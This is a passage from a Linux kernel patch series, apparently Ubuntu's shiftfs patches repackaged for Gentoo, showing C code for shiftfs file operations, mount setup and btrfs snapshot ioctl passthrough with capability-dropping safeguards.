++static int shiftfs_release(struct inode *inode, struct file *file)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++
++	if (file_info) {
++		if (file_info->realfile)
++			fput(file_info->realfile);
++
++		kmem_cache_free(shiftfs_file_info_cache, file_info);
++	}
++
++	return 0;
++}
++
++static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct inode *realinode = file_inode(file)->i_private;
++
++	return generic_file_llseek_size(file, offset, whence,
++					realinode->i_sb->s_maxbytes,
++					i_size_read(realinode));
++}
++
++/* XXX: Need to figure out what to to about atime updates, maybe other
++ * timestamps too ... ref. ovl_file_accessed() */
++
++static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
++{
++	int ifl = iocb->ki_flags;
++	rwf_t flags = 0;
++
++	if (ifl & IOCB_NOWAIT)
++		flags |= RWF_NOWAIT;
++	if (ifl & IOCB_HIPRI)
++		flags |= RWF_HIPRI;
++	if (ifl & IOCB_DSYNC)
++		flags |= RWF_DSYNC;
++	if (ifl & IOCB_SYNC)
++		flags |= RWF_SYNC;
++
++	return flags;
++}
++
++static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
++{
++	struct file *file = iocb->ki_filp;
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	ssize_t ret;
++
++	if (!iov_iter_count(iter))
++		return 0;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_iter_read(lowerfd.file, iter, &iocb->ki_pos,
++			    shiftfs_iocb_to_rwf(iocb));
++	revert_creds(oldcred);
++
++	shiftfs_file_accessed(file);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static ssize_t shiftfs_write_iter(struct kiocb *iocb, struct iov_iter *iter)
++{
++	struct file *file = iocb->ki_filp;
++	struct inode *inode = file_inode(file);
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	ssize_t ret;
++
++	if (!iov_iter_count(iter))
++		return 0;
++
++	inode_lock(inode);
++	/* Update mode */
++	shiftfs_copyattr(inode->i_private, inode);
++	ret = file_remove_privs(file);
++	if (ret)
++		goto out_unlock;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		goto out_unlock;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	file_start_write(lowerfd.file);
++	ret = vfs_iter_write(lowerfd.file, iter, &iocb->ki_pos,
++			     shiftfs_iocb_to_rwf(iocb));
++	file_end_write(lowerfd.file);
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(inode->i_private, inode);
++
++	fdput(lowerfd);
++
++out_unlock:
++	inode_unlock(inode);
++	return ret;
++}
++
++static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
++			 int datasync)
++{
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fsync_range(lowerfd.file, start, end, datasync);
++	revert_creds(oldcred);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++	const struct cred *oldcred;
++	int ret;
++
++	if (!realfile->f_op->mmap)
++		return -ENODEV;
++
++	if (WARN_ON(file != vma->vm_file))
++		return -EIO;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	vma->vm_file = get_file(realfile);
++	ret = call_mmap(vma->vm_file, vma);
++	revert_creds(oldcred);
++
++	shiftfs_file_accessed(file);
++
++	if (ret)
++		fput(realfile); /* Drop refcount from new vm_file value */
++	else
++		fput(file); /* Drop refcount from previous vm_file value */
++
++	return ret;
++}
++
++static long shiftfs_fallocate(struct file *file, int mode, loff_t offset,
++			      loff_t len)
++{
++	struct inode *inode = file_inode(file);
++	struct inode *loweri = inode->i_private;
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fallocate(lowerfd.file, mode, offset, len);
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(loweri, inode);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
++			   int advice)
++{
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fadvise(lowerfd.file, offset, len, advice);
++	revert_creds(oldcred);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_override_ioctl_creds(const struct super_block *sb,
++					const struct cred **oldcred,
++					struct cred **newcred)
++{
++	kuid_t fsuid = current_fsuid();
++	kgid_t fsgid = current_fsgid();
++
++	*oldcred = shiftfs_override_creds(sb);
++
++	*newcred = prepare_creds();
++	if (!*newcred) {
++		revert_creds(*oldcred);
++		return -ENOMEM;
++	}
++
++	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
++	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++
++	/* clear all caps to prevent bypassing capable() checks */
++	cap_clear((*newcred)->cap_bset);
++	cap_clear((*newcred)->cap_effective);
++	cap_clear((*newcred)->cap_inheritable);
++	cap_clear((*newcred)->cap_permitted);
++
++	put_cred(override_creds(*newcred));
++	return 0;
++}
++
++static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
++					      struct cred *newcred)
++{
++	return shiftfs_revert_object_creds(oldcred, newcred);
++}
++
++static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
++			       unsigned long arg)
++{
++	long ret = 0;
++	struct fd lowerfd;
++	struct cred *newcred;
++	const struct cred *oldcred;
++	struct super_block *sb = file->f_path.dentry->d_sb;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
++	if (ret)
++		goto out_fdput;
++
++	ret = vfs_ioctl(lowerfd.file, cmd, arg);
++
++	shiftfs_revert_ioctl_creds(oldcred, newcred);
++
++	shiftfs_copyattr(file_inode(lowerfd.file), file_inode(file));
++	shiftfs_copyflags(file_inode(lowerfd.file), file_inode(file));
++
++out_fdput:
++	fdput(lowerfd);
++
++	return ret;
++}
++
++static long shiftfs_ioctl(struct file *file, unsigned int cmd,
++			  unsigned long arg)
++{
++	switch (cmd) {
++	case FS_IOC_GETVERSION:
++		/* fall through */
++	case FS_IOC_GETFLAGS:
++		/* fall through */
++	case FS_IOC_SETFLAGS:
++		break;
++	default:
++		return -ENOTTY;
++	}
++
++	return shiftfs_real_ioctl(file, cmd, arg);
++}
++
++static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
++				 unsigned long arg)
++{
++	switch (cmd) {
++	case FS_IOC32_GETVERSION:
++		/* fall through */
++	case FS_IOC32_GETFLAGS:
++		/* fall through */
++	case FS_IOC32_SETFLAGS:
++		break;
++	default:
++		return -ENOIOCTLCMD;
++	}
++
++	return shiftfs_real_ioctl(file, cmd, arg);
++}
++
++enum shiftfs_copyop {
++	SHIFTFS_COPY,
++	SHIFTFS_CLONE,
++	SHIFTFS_DEDUPE,
++};
++
++static ssize_t shiftfs_copyfile(struct file *file_in, loff_t pos_in,
++				struct file *file_out, loff_t pos_out, u64 len,
++				unsigned int flags, enum shiftfs_copyop op)
++{
++	ssize_t ret;
++	struct fd real_in, real_out;
++	const struct cred *oldcred;
++	struct inode *inode_out = file_inode(file_out);
++	struct inode *loweri = inode_out->i_private;
++
++	ret = shiftfs_real_fdget(file_out, &real_out);
++	if (ret)
++		return ret;
++
++	ret = shiftfs_real_fdget(file_in, &real_in);
++	if (ret) {
++		fdput(real_out);
++		return ret;
++	}
++
++	oldcred = shiftfs_override_creds(inode_out->i_sb);
++	switch (op) {
++	case SHIFTFS_COPY:
++		ret = vfs_copy_file_range(real_in.file, pos_in, real_out.file,
++					  pos_out, len, flags);
++		break;
++
++	case SHIFTFS_CLONE:
++		ret = vfs_clone_file_range(real_in.file, pos_in, real_out.file,
++					   pos_out, len, flags);
++		break;
++
++	case SHIFTFS_DEDUPE:
++		ret = vfs_dedupe_file_range_one(real_in.file, pos_in,
++						real_out.file, pos_out, len,
++						flags);
++		break;
++	}
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(loweri, inode_out);
++
++	fdput(real_in);
++	fdput(real_out);
++
++	return ret;
++}
++
++static ssize_t shiftfs_copy_file_range(struct file *file_in, loff_t pos_in,
++				       struct file *file_out, loff_t pos_out,
++				       size_t len, unsigned int flags)
++{
++	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len, flags,
++				SHIFTFS_COPY);
++}
++
++static loff_t shiftfs_remap_file_range(struct file *file_in, loff_t pos_in,
++				       struct file *file_out, loff_t pos_out,
++				       loff_t len, unsigned int remap_flags)
++{
++	enum shiftfs_copyop op;
++
++	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
++		return -EINVAL;
++
++	if (remap_flags & REMAP_FILE_DEDUP)
++		op = SHIFTFS_DEDUPE;
++	else
++		op = SHIFTFS_CLONE;
++
++	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len,
++				remap_flags, op);
++}
++
++static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
++{
++	const struct cred *oldcred;
++	int err = -ENOTDIR;
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	err = iterate_dir(realfile, ctx);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++const struct file_operations shiftfs_file_operations = {
++	.open			= shiftfs_open,
++	.release		= shiftfs_release,
++	.llseek			= shiftfs_llseek,
++	.read_iter		= shiftfs_read_iter,
++	.write_iter		= shiftfs_write_iter,
++	.fsync			= shiftfs_fsync,
++	.mmap			= shiftfs_mmap,
++	.fallocate		= shiftfs_fallocate,
++	.fadvise		= shiftfs_fadvise,
++	.unlocked_ioctl		= shiftfs_ioctl,
++	.compat_ioctl		= shiftfs_compat_ioctl,
++	.copy_file_range	= shiftfs_copy_file_range,
++	.remap_file_range	= shiftfs_remap_file_range,
++};
++
++const struct file_operations shiftfs_dir_operations = {
++	.compat_ioctl		= shiftfs_compat_ioctl,
++	.fsync			= shiftfs_fsync,
++	.iterate_shared		= shiftfs_iterate_shared,
++	.llseek			= shiftfs_llseek,
++	.open			= shiftfs_open,
++	.read			= generic_read_dir,
++	.release		= shiftfs_release,
++	.unlocked_ioctl		= shiftfs_ioctl,
++};
++
++static const struct address_space_operations shiftfs_aops = {
++	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO */
++	.direct_IO	= noop_direct_IO,
++};
++
++static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
++			       umode_t mode, dev_t dev, struct dentry *dentry)
++{
++	struct inode *loweri;
++
++	inode->i_ino = ino;
++	inode->i_flags |= S_NOCMTIME;
++
++	mode &= S_IFMT;
++	inode->i_mode = mode;
++	switch (mode & S_IFMT) {
++	case S_IFDIR:
++		inode->i_op = &shiftfs_dir_inode_operations;
++		inode->i_fop = &shiftfs_dir_operations;
++		break;
++	case S_IFLNK:
++		inode->i_op = &shiftfs_symlink_inode_operations;
++		break;
++	case S_IFREG:
++		inode->i_op = &shiftfs_file_inode_operations;
++		inode->i_fop = &shiftfs_file_operations;
++		inode->i_mapping->a_ops = &shiftfs_aops;
++		break;
++	default:
++		inode->i_op = &shiftfs_special_inode_operations;
++		init_special_inode(inode, mode, dev);
++		break;
++	}
++
++	if (!dentry)
++		return;
++
++	loweri = dentry->d_inode;
++	if (!loweri->i_op->get_link)
++		inode->i_opflags |= IOP_NOFOLLOW;
++
++	shiftfs_copyattr(loweri, inode);
++	shiftfs_copyflags(loweri, inode);
++	set_nlink(inode, loweri->i_nlink);
++}
++
++static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++
++	if (sbinfo->mark)
++		seq_show_option(m, "mark", NULL);
++
++	if (sbinfo->passthrough)
++		seq_printf(m, ",passthrough=%u", sbinfo->passthrough);
++
++	return 0;
++}
++
++static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++	struct dentry *root = sb->s_root;
++	struct dentry *realroot = root->d_fsdata;
++	struct path realpath = { .mnt = sbinfo->mnt, .dentry = realroot };
++	int err;
++
++	err = vfs_statfs(&realpath, buf);
+ 	if (err)
+-		goto out;
++		return err;
+ 
+-	/* to mark a mount point, must be real root */
+-	if (ssi->mark && !capable(CAP_SYS_ADMIN))
+-		goto out;
++	if (!shiftfs_passthrough_statfs(sbinfo))
++		buf->f_type = sb->s_magic;
+ 
+-	/* else to mount a mark, must be userns admin */
+-	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
+-		goto out;
++	return 0;
++}
+ 
+-	err = kern_path(name, LOOKUP_FOLLOW, &path);
++static void shiftfs_evict_inode(struct inode *inode)
++{
++	struct inode *loweri = inode->i_private;
++
++	clear_inode(inode);
++
++	if (loweri)
++		iput(loweri);
++}
++
++static void shiftfs_put_super(struct super_block *sb)
++{
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++
++	if (sbinfo) {
++		mntput(sbinfo->mnt);
++		put_cred(sbinfo->creator_cred);
++		kfree(sbinfo);
++	}
++}
++
++static const struct xattr_handler shiftfs_xattr_handler = {
++	.prefix = "",
++	.get    = shiftfs_xattr_get,
++	.set    = shiftfs_xattr_set,
++};
++
++const struct xattr_handler *shiftfs_xattr_handlers[] = {
++#ifdef CONFIG_SHIFT_FS_POSIX_ACL
++	&shiftfs_posix_acl_access_xattr_handler,
++	&shiftfs_posix_acl_default_xattr_handler,
++#endif
++	&shiftfs_xattr_handler,
++	NULL
++};
++
++static inline bool passthrough_is_subset(int old_flags, int new_flags)
++{
++	if ((new_flags & old_flags) != new_flags)
++		return false;
++
++	return true;
++}
++
++static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
++{
++	int err;
++	struct shiftfs_super_info new = {};
++	struct shiftfs_super_info *info = sb->s_fs_info;
++
++	err = shiftfs_parse_mount_options(&new, data);
+ 	if (err)
+-		goto out;
++		return err;
++
++	/* Mark mount option cannot be changed. */
++	if (info->mark || (info->mark != new.mark))
++		return -EPERM;
++
++	if (info->passthrough != new.passthrough) {
++		/* Don't allow exceeding passthrough options of mark mount. */
++		if (!passthrough_is_subset(info->info_mark->passthrough,
++					   info->passthrough))
++			return -EPERM;
++
++		info->passthrough = new.passthrough;
++	}
++
++	return 0;
++}
+ 
+-	err = -EPERM;
++static const struct super_operations shiftfs_super_ops = {
++	.put_super	= shiftfs_put_super,
++	.show_options	= shiftfs_show_options,
++	.statfs		= shiftfs_statfs,
++	.remount_fs	= shiftfs_remount,
++	.evict_inode	= shiftfs_evict_inode,
++};
++
++struct shiftfs_data {
++	void *data;
++	const char *path;
++};
++
++static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
++			      int silent)
++{
++	int err;
++	struct path path = {};
++	struct shiftfs_super_info *sbinfo_mp;
++	char *name = NULL;
++	struct inode *inode = NULL;
++	struct dentry *dentry = NULL;
++	struct shiftfs_data *data = raw_data;
++	struct shiftfs_super_info *sbinfo = NULL;
++
++	if (!data->path)
++		return -EINVAL;
++
++	sb->s_fs_info = kzalloc(sizeof(*sbinfo), GFP_KERNEL);
++	if (!sb->s_fs_info)
++		return -ENOMEM;
++	sbinfo = sb->s_fs_info;
++
++	err = shiftfs_parse_mount_options(sbinfo, data->data);
++	if (err)
++		return err;
++
++	/* to mount a mark, must be userns admin */
++	if (!sbinfo->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
++		return -EPERM;
++
++	name = kstrdup(data->path, GFP_KERNEL);
++	if (!name)
++		return -ENOMEM;
++
++	err = kern_path(name, LOOKUP_FOLLOW, &path);
++	if (err)
++		goto out_free_name;
+ 
+ 	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
+ 		err = -ENOTDIR;
+-		goto out_put;
++		goto out_put_path;
+ 	}
+ 
+-	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
+-	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
+-		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
+-		err = -EINVAL;
+-		goto out_put;
+-	}
++	if (sbinfo->mark) {
++		struct super_block *lower_sb = path.mnt->mnt_sb;
++
++		/* to mark a mount point, must root wrt lower s_user_ns */
++		if (!ns_capable(lower_sb->s_user_ns, CAP_SYS_ADMIN)) {
++			err = -EPERM;
++			goto out_put_path;
++		}
+ 
+-	if (ssi->mark) {
+ 		/*
+ 		 * this part is visible unshifted, so make sure no
+ 		 * executables that could be used to give suid
+ 		 * privileges
+ 		 */
+ 		sb->s_iflags = SB_I_NOEXEC;
+-		ssi->mnt = path.mnt;
+-		dentry = path.dentry;
+-	} else {
+-		struct shiftfs_super_info *mp_ssi;
+ 
+ 		/*
+-		 * this leg executes if we're admin capable in
+-		 * the namespace, so be very careful
++		 * Handle nesting of shiftfs mounts by referring this mark
++		 * mount back to the original mark mount. This is more
++		 * efficient and alleviates concerns about stack depth.
+ 		 */
++		if (lower_sb->s_magic == SHIFTFS_MAGIC) {
++			sbinfo_mp = lower_sb->s_fs_info;
++
++			/* Doesn't make sense to mark a mark mount */
++			if (sbinfo_mp->mark) {
++				err = -EINVAL;
++				goto out_put_path;
++			}
++
++			if (!passthrough_is_subset(sbinfo_mp->passthrough,
++						   sbinfo->passthrough)) {
++				err = -EPERM;
++				goto out_put_path;
++			}
++
++			sbinfo->mnt = mntget(sbinfo_mp->mnt);
++			dentry = dget(path.dentry->d_fsdata);
++		} else {
++			sbinfo->mnt = mntget(path.mnt);
++			dentry = dget(path.dentry);
++		}
++
++		sbinfo->creator_cred = prepare_creds();
++		if (!sbinfo->creator_cred) {
++			err = -ENOMEM;
++			goto out_put_path;
++		}
++	} else {
++		/*
++		 * This leg executes if we're admin capable in the namespace,
++		 * so be very careful.
++		 */
++		err = -EPERM;
+ 		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
+-			goto out_put;
+-		mp_ssi = path.dentry->d_sb->s_fs_info;
+-		if (!mp_ssi->mark)
+-			goto out_put;
+-		ssi->mnt = mntget(mp_ssi->mnt);
++			goto out_put_path;
++
++		sbinfo_mp = path.dentry->d_sb->s_fs_info;
++		if (!sbinfo_mp->mark)
++			goto out_put_path;
++
++		if (!passthrough_is_subset(sbinfo_mp->passthrough,
++					   sbinfo->passthrough))
++			goto out_put_path;
++
++		sbinfo->mnt = mntget(sbinfo_mp->mnt);
++		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
+ 		dentry = dget(path.dentry->d_fsdata);
+-		path_put(&path);
++		sbinfo->info_mark = sbinfo_mp;
++	}
++
++	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
++	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
++		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
++		err = -EINVAL;
++		goto out_put_path;
++	}
++
++	inode = new_inode(sb);
++	if (!inode) {
++		err = -ENOMEM;
++		goto out_put_path;
+ 	}
+-	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
+-	sb->s_fs_info = ssi;
++	shiftfs_fill_inode(inode, dentry->d_inode->i_ino, S_IFDIR, 0, dentry);
++
++	ihold(dentry->d_inode);
++	inode->i_private = dentry->d_inode;
++
+ 	sb->s_magic = SHIFTFS_MAGIC;
+ 	sb->s_op = &shiftfs_super_ops;
+ 	sb->s_xattr = shiftfs_xattr_handlers;
+ 	sb->s_d_op = &shiftfs_dentry_ops;
+-	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
++	sb->s_flags |= SB_POSIXACL;
++	sb->s_root = d_make_root(inode);
++	if (!sb->s_root) {
++		err = -ENOMEM;
++		goto out_put_path;
++	}
++
+ 	sb->s_root->d_fsdata = dentry;
++	sbinfo->userns = get_user_ns(dentry->d_sb->s_user_ns);
++	shiftfs_copyattr(dentry->d_inode, sb->s_root->d_inode);
+ 
+-	return 0;
++	dentry = NULL;
++	err = 0;
+ 
+- out_put:
++out_put_path:
+ 	path_put(&path);
+- out:
++
++out_free_name:
+ 	kfree(name);
+-	kfree(ssi);
++
++	dput(dentry);
++
+ 	return err;
+ }
+ 
+@@ -764,17 +1869,26 @@ static struct file_system_type shiftfs_type = {
+ 
+ static int __init shiftfs_init(void)
+ {
++	shiftfs_file_info_cache = kmem_cache_create(
++		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
++		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
++	if (!shiftfs_file_info_cache)
++		return -ENOMEM;
++
+ 	return register_filesystem(&shiftfs_type);
+ }
+ 
+ static void __exit shiftfs_exit(void)
+ {
+ 	unregister_filesystem(&shiftfs_type);
++	kmem_cache_destroy(shiftfs_file_info_cache);
+ }
+ 
+ MODULE_ALIAS_FS("shiftfs");
+ MODULE_AUTHOR("James Bottomley");
+-MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
++MODULE_AUTHOR("Seth Forshee <seth.forshee@canonical.com>");
++MODULE_AUTHOR("Christian Brauner <christian.brauner@ubuntu.com>");
++MODULE_DESCRIPTION("id shifting filesystem");
+ MODULE_LICENSE("GPL v2");
+ module_init(shiftfs_init)
+ module_exit(shiftfs_exit)
+-- 
+2.39.2
+
+From a2e0843dcd21746dfc23df95ab8c93af942fac6b Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Thu, 4 Apr 2019 15:39:13 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support some btrfs ioctls
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1823186
+
+Shiftfs currently only passes through a few ioctl()s to the underlay. These
+are ioctl()s that are generally considered safe. Doing it for random
+ioctl()s would be a security issue. Permissions for ioctl()s are not
+checked before the filesystem gets involved so if we were to override
+credentials we e.g. could do a btrfs tree search in the underlay which we
+normally wouldn't be allowed to do.
+However, the btrfs filesystem allows unprivileged users to perform various
+operations through its ioctl() interface. With shiftfs these ioctl() are
+currently not working. To not regress users that expect btrfs ioctl()s to
+work in unprivileged containers we can create a whitelist of ioctl()s that
+we allow to go through to the underlay and for which we also switch
+credentials.
+The main problem is how we switch credentials. Since permissions checks for
+ioctl()s are
+done by the actual file system and not by the vfs this would mean that any
+additional capable(<cap>)-based checks done by the filesystem would
+unconditonally pass after we switch credentials. So to make credential
+switching safe we drop *all* capabilities when switching credentials. This
+means that only inode-based permission checks will pass.
+
+Btrfs also allows unprivileged users to delete snapshots when the
+filesystem is mounted with user_subvol_rm_allowed mount option or if the
+the callers is capable(CAP_SYS_ADMIN). The latter should never be the case
+with unprivileged users. To make sure we only allow removal of snapshots in
+the former case we drop all capabilities (see above) when switching
+credentials.
+
+Additonally, btrfs allows the creation of snapshots. To make this work we
+need to be (too) clever. When doing snapshots btrfs requires that an fd to
+the directory the snapshot is supposed to be created in be passed along.
+This fd obviously references a shiftfs file and as such a shiftfs dentry
+and inode.  This will cause btrfs to yell EXDEV. To circumnavigate this
+problem we need to silently temporarily replace the passed in fd with an fd
+that refers to a file that references a btrfs dentry and inode.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 156 +++++++++++++++++++++++++++++++++++++++++++++++++--
+ 1 file changed, 151 insertions(+), 5 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index ad1ae5bce6c1..678cad30f4a5 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1,6 +1,8 @@
++#include <linux/btrfs.h>
+ #include <linux/capability.h>
+ #include <linux/cred.h>
+ #include <linux/mount.h>
++#include <linux/fdtable.h>
+ #include <linux/file.h>
+ #include <linux/fs.h>
+ #include <linux/namei.h>
+@@ -41,7 +43,21 @@ static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
+ 
+ #define SHIFTFS_PASSTHROUGH_NONE 0
+ #define SHIFTFS_PASSTHROUGH_STAT 1
+-#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
++#define SHIFTFS_PASSTHROUGH_IOCTL 2
++#define SHIFTFS_PASSTHROUGH_ALL                                                \
++	(SHIFTFS_PASSTHROUGH_STAT | SHIFTFS_PASSTHROUGH_IOCTL)
++
++static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
++{
++	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
++		return false;
++
++	if (info->info_mark &&
++	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
++		return false;
++
++	return true;
++}
+ 
+ static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
+ {
+@@ -1345,18 +1361,120 @@ static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
+ 	return shiftfs_revert_object_creds(oldcred, newcred);
+ }
+ 
++static inline bool is_btrfs_snap_ioctl(int cmd)
++{
++	if ((cmd == BTRFS_IOC_SNAP_CREATE) || (cmd == BTRFS_IOC_SNAP_CREATE_V2))
++		return true;
++
++	return false;
++}
++
++static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
++					  void __user *arg,
++					  struct btrfs_ioctl_vol_args *v1,
++					  struct btrfs_ioctl_vol_args_v2 *v2)
++{
++	int ret;
++
++	if (!is_btrfs_snap_ioctl(cmd))
++		return 0;
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE)
++		ret = copy_to_user(arg, v1, sizeof(*v1));
++	else
++		ret = copy_to_user(arg, v2, sizeof(*v2));
++
++	fdput(lfd);
++	__close_fd(current->files, fd);
++	kfree(v1);
++	kfree(v2);
++
++	return ret;
++}
++
++static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
++					  struct btrfs_ioctl_vol_args **b1,
++					  struct btrfs_ioctl_vol_args_v2 **b2,
++					  struct fd *lfd,
++					  int *newfd)
++{
++	int oldfd, ret;
++	struct fd src;
++	struct btrfs_ioctl_vol_args *v1 = NULL;
++	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
++
++	if (!is_btrfs_snap_ioctl(cmd))
++		return 0;
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE) {
++		v1 = memdup_user(arg, sizeof(*v1));
++		if (IS_ERR(v1))
++			return PTR_ERR(v1);
++		oldfd = v1->fd;
++		*b1 = v1;
++	} else {
++		v2 = memdup_user(arg, sizeof(*v2));
++		if (IS_ERR(v2))
++			return PTR_ERR(v2);
++		oldfd = v2->fd;
++		*b2 = v2;
++	}
++
++	src = fdget(oldfd);
++	if (!src.file)
++		return -EINVAL;
++
++	ret = shiftfs_real_fdget(src.file, lfd);
++	fdput(src);
++	if (ret)
++		return ret;
++
++	*newfd = get_unused_fd_flags(lfd->file->f_flags);
++	if (*newfd < 0) {
++		fdput(*lfd);
++		return *newfd;
++	}
++
++	fd_install(*newfd, lfd->file);
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE) {
++		v1->fd = *newfd;
++		ret = copy_to_user(arg, v1, sizeof(*v1));
++		v1->fd = oldfd;
++	} else {
++		v2->fd = *newfd;
++		ret = copy_to_user(arg, v2, sizeof(*v2));
++		v2->fd = oldfd;
++	}
++
++	if (ret)
++		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
++
++	return ret;
++}
++
+ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 			       unsigned long arg)
+ {
+-	long ret = 0;
+ 	struct fd lowerfd;
+ 	struct cred *newcred;
+ 	const struct cred *oldcred;
++	int newfd = -EBADF;
++	long err = 0, ret = 0;
++	void __user *argp = (void __user *)arg;
++	struct fd btrfs_lfd = {};
+ 	struct super_block *sb = file->f_path.dentry->d_sb;
++	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
++	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
++
++	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
++					     &btrfs_lfd, &newfd);
++	if (ret < 0)
++		return ret;
+ 
+ 	ret = shiftfs_real_fdget(file, &lowerfd);
+ 	if (ret)
+-		return ret;
++		goto out_restore;
+ 
+ 	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
+ 	if (ret)
+@@ -1372,9 +1490,33 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ out_fdput:
+ 	fdput(lowerfd);
+ 
++out_restore:
++	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
++					     btrfs_v1, btrfs_v2);
